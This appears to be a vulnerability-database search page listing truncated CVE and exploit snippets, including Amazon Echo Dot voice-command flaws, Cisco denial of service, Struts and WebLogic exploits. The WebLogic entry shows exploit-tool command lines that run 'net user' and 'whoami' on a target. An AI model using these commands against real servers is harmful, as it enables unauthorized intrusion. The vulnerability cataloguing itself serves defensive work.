4151 matches found
Exploit for Expression Language Injection in Apache Struts
s2-062 Remote code execution for S2-062 CVE-2021-31805 – Ver...
Novel Attack Turns Amazon Devices Against Themselves
UPDATE Researchers from the University of London and the University of Catania have discovered how to weaponize Amazon Echo devices to hack themselves. The attack – dubbed “Alexa vs. Alexa” – leverages what the researchers called “a command self-issue vulnerability”: using pre-recorded messages which,...
CVE-2022-25809
Improper Neutralization of audio output from 3rd and 4th Generation Amazon Echo Dot devices allows arbitrary voice command execution on these devices via a malicious skill in the case of remote attackers or by pairing a malicious Bluetooth device in the case of physically proximate attackers, aka...
Input validation
Improper Neutralization of audio output from 3rd and 4th Generation Amazon Echo Dot devices allows arbitrary voice command execution on these devices via a malicious skill in the case of remote attackers or by pairing a malicious Bluetooth device in the case of physically proximate attackers, aka...
Amazon Echo Dot Security Vulnerability
The Amazon Echo Dot is a voice-activated speaker from Amazon.com. It can be used to play music, control smart home devices, make calls, answer questions, set timers and alarms, and more using Alexa. The Amazon Echo Dot 3rd and 4th generation has a security vulnerability that stems from improper...
CVE-2022-25809
CVE-2022-25809 affects Amazon Echo Dot devices (3rd and 4th Gen). Root cause: improper neutralization of audio output enables arbitrary voice command execution via a malicious skill (remote) or by pairing a malicious Bluetooth device (physical proximity) in an Alexa-versus-Alexa (AvA) scenario. I...
PT-2022-17534 · Amazon · Amazon Echo Dot
Name of the Vulnerable Software and Affected Versions: Amazon Echo Dot devices, 3rd and 4th Generation Description: The issue allows for arbitrary voice command execution on affected devices. This can be achieved by a remote attacker using a malicious skill or by a physically proximate attacker...
Mageia: Security Advisory (MGASA-2021-0027)
The remote host is missing an update for the SPDX-FileCopyrightText: 2022 Greenbone AG Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holder(s). SPDX-License-Identifier: GPL-2.0-only if(description)...
CVE-2022-23993
/usr/local/www/pkg.php in pfSense CE before 2.6.0 and pfSense Plus before 22.01 uses $_REQUEST['pkg_filter'] in a PHP echo call, causing XSS...
Code injection
A vulnerability has been identified in APOGEE MBC PPC BACnet All versions, APOGEE MBC PPC P2 Ethernet All versions, APOGEE MEC PPC BACnet All versions, APOGEE MEC PPC P2 Ethernet All versions, APOGEE PXC Compact BACnet All versions = V2.3 and = V2.3 and = V2.3 and = V2.3 and = V2.3 and = V2.3 and...
Siemens Nucleus ReadyStart Security Vulnerability
Siemens Nucleus ReadyStart is a bundled solution from Siemens, Germany. It is used to accelerate the startup of complete systems and provides a rich set of board support packages (BSPs). A security vulnerability exists in Siemens Nucleus ReadyStart, which originates from an ICMP echo packet wit...
CVE-2021-1588
A vulnerability in the MPLS Operation, Administration, and Maintenance (OAM) feature of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper input validation when an affected devi...
CVE-2021-1588 Cisco NX-OS Software MPLS OAM Denial of Service Vulnerability
A vulnerability in the MPLS Operation, Administration, and Maintenance (OAM) feature of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper input validation when an affected devi...
Cisco NX-OS Software Buffer Error Vulnerability
A denial-of-service vulnerability exists in the MPLS OAM feature of Cisco NX-OS Software, which can be exploited by an attacker by sending malicious MPLS echo requests or echo reply packets to cause the MPLS OAM process to crash and restart multiple times...
Exploit for CVE-2020-14882
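CVE-2020-14882ALL: CVE-2020-14882ALL all-in-one exploitation tool, supporting command echo detection, batch command echo, and command execution without echo via an external XML file. Required modules: requests, http.client (This tool is for authorized security testing only; do not use it illegally. The author bears no responsibility for violations.) Options. Feature 1: command echo python3 CVE-2020-14882ALL.py -u http://1.1.1.1:7001 -c "net user" python3 CVE-2020-14882ALL.py -u http://1.1.1.1:7001 -c "whoami" Feature 2: batch command echo python3...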
CVE-2021-37436
Amazon Echo Dot devices through 2021-07-02 sometimes allow attackers, who have physical access to a device after a factory reset, to obtain sensitive information via a series of complex hardware and software attacks. NOTE: reportedly, there were vendor marketing statements about safely removing...
Design/Logic Flaw
Amazon Echo Dot devices through 2021-07-02 sometimes allow attackers, who have physical access to a device after a factory reset, to obtain sensitive information via a series of complex hardware and software attacks. NOTE: reportedly, there were vendor marketing statements about safely removing...
CVE-2021-37436
CVE-2021-37436 affects Amazon Echo Dot devices. The connected sources describe a design/logic flaw that, after a factory reset, can let an attacker with physical access extract sensitive information through a sequence of hardware and software attacks. There are no published patch details in the p...